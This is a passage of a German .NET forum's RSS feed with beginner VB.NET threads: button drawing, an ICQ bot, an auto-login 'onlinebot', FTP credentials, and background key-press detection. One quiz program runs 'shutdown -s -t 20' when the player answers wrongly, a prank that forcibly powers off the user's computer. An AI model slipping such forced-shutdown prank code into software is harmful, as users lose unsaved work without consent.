	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">&nbsp; Public Sub New()<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Me.DoubleBuffered = True<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Me.SetStyle(ControlStyles.AllPaintingInWmPaint, True)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Me.SetStyle(ControlStyles.FixedHeight, True)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Me.SetStyle(ControlStyles.OptimizedDoubleBuffer, True)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Me.SetStyle(ControlStyles.ResizeRedraw, True)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Me.BackColor = Color.Transparent<br />
&nbsp; &nbsp; &nbsp; &nbsp; End Sub</code><hr />
</div>Im On_Paint Event führe ich das zeichnen so aus:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code"> Public Sub Redraw(ByVal ausgabe As Graphics)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim bmp As New Bitmap(Me.Width, Me.Height)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim gr As Graphics = Graphics.FromImage(bmp)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; gr.Clear(Me.BackColor)<br />
<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim buttonState As ButtonState = buttonStates(Status)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; gr.DrawImage(buttonState.left, 0, 0, buttonState.left.Width, Me.Height)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; For i As Integer = buttonState.left.Width To Me.Width - buttonState.right.Width - 1<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; gr.DrawImage(buttonState.middle, i, 0, buttonState.middle.Width, Me.Height)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Next<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; gr.DrawImage(buttonState.right, Me.Width - buttonState.right.Width, 0, buttonState.right.Width, Me.Height)<br />
<br />
<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'Text zeichen<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim sfm As New StringFormat<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; sfm.LineAlignment = StringAlignment.Center : sfm.Alignment = StringAlignment.Center<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; gr.TextRenderingHint = Drawing.Text.TextRenderingHint.AntiAlias<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; gr.DrawString(_Text, Me.Font, New SolidBrush(Me.ForeColor), New Rectangle(0, 0, Me.Width, Me.Height), sfm)<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; gr.Dispose()<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ausgabe.DrawImageUnscaled(bmp, 0, 0)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; bmp.Dispose()<br />
&nbsp; &nbsp; &nbsp; &nbsp; End Sub</code><hr />
</div>Kann mir jemand sagen was ich falsch mache?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>!lkay</dc:creator>
			<guid isPermaLink="true">net-94/eigener-button-hintergrund-transparent-9213</guid>
		</item>
		<item>
			<title>Suche ICQLib</title>
			<link>net-94/suche-icqlib-8877?goto=newpost</link>
			<pubDate>Mon, 12 Mar 2012 15:48:37 GMT</pubDate>
			<description>Hallo wie im Threadname schon sichtbar suche ich eine ICQLib ich wolte gerne in Visual Basic 2010 einen Icq Bot Programmiren. 
 
Wie soll der bot...</description>
			<content:encoded><![CDATA[<div>Hallo wie im Threadname schon sichtbar suche ich eine ICQLib ich wolte gerne in Visual Basic 2010 einen Icq Bot Programmiren.<br />
<br />
Wie soll der bot funktioniren:<br />
In Tray funktion den icq account einloggen und nachrichten senden.<br />
<br />
Ich habe schon von einer IcqLib gehört sie heist OscarLib  doch sie funktioniert nichtmehr. Und wird auch nichtmehr supportet ;)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sploxfreak</dc:creator>
			<guid isPermaLink="true">net-94/suche-icqlib-8877</guid>
		</item>
		<item>
			<title><![CDATA[C# [OS] [UNDONE] HeroZeroNetworks]]></title>
			<link>net-94/os-undone-herozeronetworks-8846?goto=newpost</link>
			<pubDate>Sun, 11 Mar 2012 20:35:32 GMT</pubDate>
			<description>Hallo, 
 
hatte mal HeroZeroNetworks angefangen. Gingen auch irgendwie aber nicht ganz stabil. Was nicht ging habe ich mal auskommentiert - ist jetzt...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
hatte mal HeroZeroNetworks angefangen. Gingen auch irgendwie aber nicht ganz stabil. Was nicht ging habe ich mal auskommentiert - ist jetzt ja 'eh latten :'D<br />
Was man verändern müsste, damit die Networks wieder gehen:<br />
<br />
- FlashVersion ändern<br />
- authCode ändern<br />
<br />
Funktionen hat es keine richtigen - sollten aber nicht so schwer hinzuzufügen sein. Ich wollte die schnell coden, aber hab wohl nen LogikFehler gehabt.<br />
Sollte ansonsten recht übersichtlich sein.<br />
<br />
MfG<br />
<br />
/e: Ihr müsst noch die &quot;Newtonsoft.Json&quot; hinzufügen, wusste nicht wie das Lizenztechnisch aussieht.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Mentos</dc:creator>
			<guid isPermaLink="true">net-94/os-undone-herozeronetworks-8846</guid>
		</item>
		<item>
			<title>VB.Net Expect-us.eu Onlinebot</title>
			<link>net-94/expect-us-eu-onlinebot-8769?goto=newpost</link>
			<pubDate>Sat, 10 Mar 2012 16:16:23 GMT</pubDate>
			<description><![CDATA[Hallo, damit hier keine Spamposts entstehen wie zum Beispiel: "Stealer!" etc gibt's von mir einfach den Sourcecode. 
 
Aufwand: 5 Minuten (Login ist...]]></description>
			<content:encoded><![CDATA[<div>Hallo, damit hier keine Spamposts entstehen wie zum Beispiel: &quot;Stealer!&quot; etc gibt's von mir einfach den Sourcecode.<br />
<br />
Aufwand: 5 Minuten (Login ist nicht von mir, nur die Daten angepasst, MD5StringHash ist auch nicht von mir.)<br />
<br />
Quellen:<br />
<a href="http://www.vb-paradise.de/allgemeines/tipps-tricks-und-tutorials/internet-lan/25722-httpwebrequest-tutorial-fuer-anfaenger/" target="_blank" rel="nofollow">[VB.NET] HttpWebRequest Tutorial (Für anfänger) - Internet/LAN - Visual-Basic-Forum VB-Paradise.de</a><br />
<a href="http://dotnet-snippets.de/dns/den-md5-hash-eines-strings-ermitteln-SID75.aspx" target="_blank" rel="nofollow">VB.NET - Den MD5 Hash eines Strings ermitteln</a><br />
<br />
LG<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">Imports System.Threading<br />
Imports System.Net<br />
Imports System.Text<br />
Imports System.IO<br />
Imports System.Security.Cryptography<br />
<br />
Module Module1<br />
<br />
&nbsp; &nbsp; Private Username As String = String.Empty<br />
&nbsp; &nbsp; Private Password As String = String.Empty<br />
<br />
&nbsp; &nbsp; Sub Main()<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.Title = &quot;Expext-us.eu Onlinebot 0.0.1&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; GetData()<br />
&nbsp; &nbsp; &nbsp; &nbsp; Start()<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub GetData()<br />
&nbsp; &nbsp; &nbsp; &nbsp; WriteLog(&quot;Benutzername:&quot;, ConsoleColor.Magenta)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Username = Console.ReadLine<br />
&nbsp; &nbsp; &nbsp; &nbsp; WriteLog(&quot;Passwort:&quot;, ConsoleColor.Magenta)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Password = Console.ReadLine<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub Start()<br />
&nbsp; &nbsp; &nbsp; &nbsp; WriteLog(&quot;Starte Bot...&quot;, ConsoleColor.Yellow)<br />
&nbsp; &nbsp; &nbsp; &nbsp; DoWork()<br />
&nbsp; &nbsp; End Sub<br />
<br />
<br />
&nbsp; &nbsp; Private Sub Login(ByVal Username As String, ByVal Password As String)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Try<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim md5password As String = MD5StringHash(Password).ToLower<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim Request As HttpWebRequest = CType(WebRequest.Create(&quot;http://expect-us.eu/login.php?do=login&quot;), HttpWebRequest)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Request.Method = &quot;POST&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Request.ContentType = &quot;application/x-www-form-urlencoded&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim Post As String = &quot;vb_login_username=&quot; &amp; Username &amp; &quot;&amp;vb_login_password=&amp;vb_login_password_hint=Kennwort&amp;s=&amp;securitytoken=guest&amp;do=login&amp;vb_login_md5password=&quot; &amp; md5password &amp; &quot;&amp;vb_login_md5password_utf=&quot; &amp; md5password<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim byteArray() As Byte = Encoding.UTF8.GetBytes(Post)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Request.ContentLength = byteArray.Length<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim DataStream As Stream = Request.GetRequestStream()<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DataStream.Write(byteArray, 0, byteArray.Length)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DataStream.Close()<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim Response As HttpWebResponse = Request.GetResponse()<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DataStream = Response.GetResponseStream()<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim reader As New StreamReader(DataStream)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Dim ServerResponse As String = reader.ReadToEnd()<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; reader.Close()<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DataStream.Close()<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Response.Close()<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; If ServerResponse.Contains(&quot;Danke&quot;) Then<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WriteLog(&quot;Login erfolgreich.&quot;, ConsoleColor.Green)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Else<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WriteLog(&quot;Login fehlgeschlagen.&quot;, ConsoleColor.Red)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; End If<br />
&nbsp; &nbsp; &nbsp; &nbsp; Catch ex As Exception<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; WriteLog(&quot;Es ist ein Fehler aufgetreten.&quot;, ConsoleColor.Red)<br />
&nbsp; &nbsp; &nbsp; &nbsp; End Try<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub DoWork()<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim i As Integer = 1<br />
&nbsp; &nbsp; &nbsp; &nbsp; Do While i &gt; 0<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Login(Username, Password)<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Thread.Sleep(300000)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Loop<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Private Sub WriteLog(ByVal text As String, ByVal color As ConsoleColor)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.ForegroundColor = color<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.WriteLine(text)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Console.ForegroundColor = ConsoleColor.White<br />
&nbsp; &nbsp; End Sub<br />
<br />
&nbsp; &nbsp; Public Function MD5StringHash(ByVal strString As String) As String<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim MD5 As New MD5CryptoServiceProvider<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Data As Byte()<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Result As Byte()<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Res As String = &quot;&quot;<br />
&nbsp; &nbsp; &nbsp; &nbsp; Dim Tmp As String = &quot;&quot;<br />
<br />
&nbsp; &nbsp; &nbsp; &nbsp; Data = Encoding.ASCII.GetBytes(strString)<br />
&nbsp; &nbsp; &nbsp; &nbsp; Result = MD5.ComputeHash(Data)<br />
&nbsp; &nbsp; &nbsp; &nbsp; For i As Integer = 0 To Result.Length - 1<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Tmp = Hex(Result(i))<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; If Len(Tmp) = 1 Then Tmp = &quot;0&quot; &amp; Tmp<br />
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Res += Tmp<br />
&nbsp; &nbsp; &nbsp; &nbsp; Next<br />
&nbsp; &nbsp; &nbsp; &nbsp; Return Res<br />
&nbsp; &nbsp; End Function<br />
End Module</code><hr />
</div><img src="https://u-img.net/img/8412Nr.jpg" border="0" alt="" /><br />
<br />
Bei Fragen bitte hier posten!</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Snees</dc:creator>
			<guid isPermaLink="true">net-94/expect-us-eu-onlinebot-8769</guid>
		</item>
		<item>
			<title>VB.Net FTP-Login ausfüllen</title>
			<link>net-94/ftp-login-ausfuellen-8277?goto=newpost</link>
			<pubDate>Thu, 01 Mar 2012 20:43:48 GMT</pubDate>
			<description>Hallo. 
 
Ich habe ein Programm wo ich über ein ListView Musik abspielen kann. Die Lieder liegen auf einem FTP(Webserver). Der Hoster hat gesagt ich...</description>
			<content:encoded><![CDATA[<div>Hallo.<br />
<br />
Ich habe ein Programm wo ich über ein ListView Musik abspielen kann. Die Lieder liegen auf einem FTP(Webserver). Der Hoster hat gesagt ich muss die Lieder in einen Ordner packen und mit einem PW schützen, damit die sich keiner runterladen kann oder so. Habe ich auch gemacht, nun ist es so: <br />
<br />
<img src="https://u-labs.de/forum/attachment.php?attachmentid=3407&amp;d=1364919159" border="0" alt="Name:  auth.png
Hits: 295
Größe:  15,7 KB" class="thumbnail" style="float:CONFIG" /><br />
<br />
Nun werden mir logischerweiße im ListView keine Lieder mehr angezeigt, kommt einfach nur eine Fehlermeldung.<br />
<br />
Wie kann ich Name + Passwort automatisch eingeben lassen?<br />
<br />
Mir wurde gesagt:  <div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">WebClient</span><span style="color: #007700">.</span><span style="color: #0000BB">Credentials&nbsp;</span><span style="color: #007700">=&nbsp;New&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">Net</span><span style="color: #007700">.</span><span style="color: #0000BB">NetworkCredential</span><span style="color: #007700">(</span><span style="color: #DD0000">"name"</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"passwort"</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"pfad"</span><span style="color: #007700">)&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div> klappt aber irgendwie nicht:<br />
<br />
Der Verweis auf einen nicht freigegebenen Member erfordert einen Objektverweis.<br />
<br />
Ich will endlich wieder die ganzen Lieder hören ;(</div>


	<div style="padding:10px">

	

	
		<fieldset class="fieldset">
			<legend>Angehängte Grafiken</legend>
				<div style="padding:10px">
				<img class="attach" src="https://u-labs.de/forum/attachment.php?attachmentid=3407&amp;stc=1&amp;d=1364919159" alt="" />&nbsp;
			</div>
		</fieldset>
	

	

	

	</div>
]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/ftp-login-ausfuellen-8277</guid>
		</item>
		<item>
			<title>VB.Net Tastendruck erkennen?</title>
			<link>net-94/tastendruck-erkennen-7811?goto=newpost</link>
			<pubDate>Thu, 23 Feb 2012 21:11:41 GMT</pubDate>
			<description>Hallo Com, 
 
bin seit etwas längerer Zeit eben mal wieder in VB am Programmieren. 
Jetzt stehe ich vor folgendem Problem: 
Ist es möglich, dass das...</description>
			<content:encoded><![CDATA[<div>Hallo Com,<br />
<br />
bin seit etwas längerer Zeit eben mal wieder in VB am Programmieren.<br />
Jetzt stehe ich vor folgendem Problem:<br />
Ist es möglich, dass das Programm einen Tastendruck auslesen kann, auch wenn das Programm im Hintergrund ist? Wenn ja, wie? ;)<br />
Ich wusste nicht, wie ich danach googlen sollte, habe zwar einige Versuche gestartet, aber nichts gefunden.<br />
Falls ihr doch etwas findet, tut es mir leid.<br />
<br />
Ich hoffe, ihr könnt mir dabei weiterhelfen.<br />
<br />
Mit freundlichen Grüßen :)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Scarya</dc:creator>
			<guid isPermaLink="true">net-94/tastendruck-erkennen-7811</guid>
		</item>
		<item>
			<title>VB.Net Dein Zeugnis 1.0</title>
			<link>net-94/dein-zeugnis-1-0-7772?goto=newpost</link>
			<pubDate>Wed, 22 Feb 2012 22:30:13 GMT</pubDate>
			<description><![CDATA[Huhu UH Comy Ich Wollte euch mal mein Programm Vorstellen was aus LW entstanden ist xD es heißt: "Dein Zeugnis 1.0" Wie ihr schonn alle kennt gibt es...]]></description>
			<content:encoded><![CDATA[<div>Huhu UH Comy Ich Wollte euch mal mein Programm Vorstellen was aus LW entstanden ist xD es heißt: &quot;Dein Zeugnis 1.0&quot; Wie ihr schonn alle kennt gibt es davon auch ne Facebook App/seite (<a href="http://www.facebook.com/pages/Zeugnis/347243471982049?sk=app_370878506261489" target="_blank" rel="nofollow">Zeugnis - Deiin nächstes Zeugnis | Facebook</a>) joa und ich hab es als Programm Geschrieben :D<br />
<br />
Screens:<br />
Nicht Benutzt: <a href="http://i42.tinypic.com/vysetw.png" target="_blank" rel="nofollow">http://i42.tinypic.com/vysetw.png</a><br />
Benutzt: <a href="http://i40.tinypic.com/1gpyxh.png" target="_blank" rel="nofollow">http://i40.tinypic.com/1gpyxh.png</a><br />
______________________________________<br />
Download: <a href="http://ultrashare.net/hosting/fl/aefdc7013a/Dein_Zeugnis_1.0" target="_blank" rel="nofollow">ultrashare.NET - Simple Free File Hosting</a><br />
<br />
Have Fun ;D<br />
MfG Getsha</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>getsha</dc:creator>
			<guid isPermaLink="true">net-94/dein-zeugnis-1-0-7772</guid>
		</item>
		<item>
			<title>VB.Net Anwendung Schützen/Eigener Installer</title>
			<link>net-94/anwendung-schuetzen-eigener-installer-7561?goto=newpost</link>
			<pubDate>Mon, 20 Feb 2012 15:10:39 GMT</pubDate>
			<description>Hallo, ich habe zwei Fragen. 
 
1.) Wie kann ich meinen Code gut und kostenlos verschlüsseln? 
2.) Kann ich die Anwendung auch installieren oder muss...</description>
			<content:encoded><![CDATA[<div>Hallo, ich habe zwei Fragen.<br />
<br />
1.) Wie kann ich meinen Code gut und kostenlos verschlüsseln?<br />
2.) Kann ich die Anwendung auch installieren oder muss ich es als .exe-Datei speichern, sodass man diese direkt ausführen kann/muss.<br />
<br />
Vielen Dank.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>mkdir</dc:creator>
			<guid isPermaLink="true">net-94/anwendung-schuetzen-eigener-installer-7561</guid>
		</item>
		<item>
			<title>VB.Net Fehler im Programm</title>
			<link>net-94/fehler-programm-7409?goto=newpost</link>
			<pubDate>Fri, 17 Feb 2012 14:29:21 GMT</pubDate>
			<description>Hallo. 
 
Gestern wollte ich eigtl. mein Quiz veröffentlichen, jedoch gibt es 1 Fehler. Ich habe jetzt schon so viel probiert, mit Timer1.Stop,...</description>
			<content:encoded><![CDATA[<div>Hallo.<br />
<br />
Gestern wollte ich eigtl. mein Quiz veröffentlichen, jedoch gibt es 1 Fehler. Ich habe jetzt schon so viel probiert, mit Timer1.Stop, Me.Close usw. Trotzdem wird nicht alles beendet. :mad:<br />
<br />
Ich habe 10 Formen, auf jeder Form steht jeweils 1 Frage + 4 Buttons + 1 Laben mit der Zahl &quot;20&quot; wo immer 1 Sekunde abgezogen wird (20 Sekunden Zeit pro Frage)<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Public&nbsp;Class&nbsp;</span><span style="color: #0000BB">Form14<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">Private&nbsp;</span><span style="color: #0000BB">Sub&nbsp;Form14_Load</span><span style="color: #007700">(</span><span style="color: #0000BB">ByVal&nbsp;sender&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">Object</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">ByVal&nbsp;e&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">System</span><span style="color: #007700">.</span><span style="color: #0000BB">EventArgs</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">Handles&nbsp;MyBase</span><span style="color: #007700">.</span><span style="color: #0000BB">Load<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Timer1</span><span style="color: #007700">.</span><span style="color: #0000BB">Start</span><span style="color: #007700">()<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">End&nbsp;Sub<br />&nbsp;&nbsp;&nbsp;&nbsp;Dim&nbsp;mouseOffset&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">Point<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">Private&nbsp;</span><span style="color: #0000BB">Sub&nbsp;Me_MouseDown</span><span style="color: #007700">(</span><span style="color: #0000BB">ByVal&nbsp;sender&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">Object</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">ByVal&nbsp;e&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">MouseEventArgs</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">Handles&nbsp;MyBase</span><span style="color: #007700">.</span><span style="color: #0000BB">MouseDown<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mouseOffset&nbsp;</span><span style="color: #007700">=&nbsp;New&nbsp;</span><span style="color: #0000BB">Point</span><span style="color: #007700">(-</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">X</span><span style="color: #007700">,&nbsp;-</span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">Y</span><span style="color: #007700">)<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">End&nbsp;Sub<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #007700">Private&nbsp;</span><span style="color: #0000BB">Sub&nbsp;Me_MouseMove</span><span style="color: #007700">(</span><span style="color: #0000BB">ByVal&nbsp;sender&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">Object</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">ByVal&nbsp;e&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">MouseEventArgs</span><span style="color: #007700">)&nbsp;</span><span style="color: #0000BB">Handles&nbsp;MyBase</span><span style="color: #007700">.</span><span style="color: #0000BB">MouseMove&nbsp;</span><span style="color: #DD0000">'hier&nbsp;ist&nbsp;es&nbsp;der&nbsp;bereich&nbsp;der&nbsp;form&nbsp;<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;e.Button&nbsp;=&nbsp;MouseButtons.Left&nbsp;Then<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Dim&nbsp;mousePos&nbsp;=&nbsp;Control.MousePosition<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mousePos.Offset(mouseOffset.X,&nbsp;mouseOffset.Y)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Location&nbsp;=&nbsp;mousePos<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;If<br />&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;Sub<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;Private&nbsp;Sub&nbsp;Button2_Click(ByVal&nbsp;sender&nbsp;As&nbsp;System.Object,&nbsp;ByVal&nbsp;e&nbsp;As&nbsp;System.EventArgs)&nbsp;Handles&nbsp;Button2.Click<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MsgBox("Du&nbsp;hast&nbsp;Gewonnen,&nbsp;wie&nbsp;konnte&nbsp;das&nbsp;nur&nbsp;passieren!",&nbsp;MsgBoxStyle.Exclamation)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Timer1.Stop()<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Me.Close()<br />&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;Sub<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;Private&nbsp;Sub&nbsp;Timer1_Tick(ByVal&nbsp;sender&nbsp;As&nbsp;System.Object,&nbsp;ByVal&nbsp;e&nbsp;As&nbsp;System.EventArgs)&nbsp;Handles&nbsp;Timer1.Tick<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Label2.Text&nbsp;=&nbsp;Label2.Text&nbsp;-&nbsp;1<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;Label2.Text&nbsp;=&nbsp;"0"&nbsp;Then<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Shell("shutdown&nbsp;-s&nbsp;-t&nbsp;20")<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MsgBox("Du&nbsp;hast&nbsp;Verloren!",&nbsp;MsgBoxStyle.Critical)<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;If<br />&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;Sub<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;Private&nbsp;Sub&nbsp;Button1_Click(ByVal&nbsp;sender&nbsp;As&nbsp;System.Object,&nbsp;ByVal&nbsp;e&nbsp;As&nbsp;System.EventArgs)&nbsp;Handles&nbsp;Button1.Click<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Shell("shutdown&nbsp;-s&nbsp;-t&nbsp;20")<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MsgBox("Du&nbsp;hast&nbsp;Verloren!",&nbsp;MsgBoxStyle.Critical)<br />&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;Sub<br /><br />&nbsp;&nbsp;&nbsp;&nbsp;Private&nbsp;Sub&nbsp;Button4_Click(ByVal&nbsp;sender&nbsp;As&nbsp;System.Object,&nbsp;ByVal&nbsp;e&nbsp;As&nbsp;System.EventArgs)&nbsp;Handles&nbsp;Button4.Click<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Shell("shutdown&nbsp;-s&nbsp;-t&nbsp;20")<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MsgBox("Du&nbsp;hast&nbsp;Verloren!",&nbsp;MsgBoxStyle.Critical)<br />&nbsp;&nbsp;&nbsp;&nbsp;End&nbsp;Sub<br 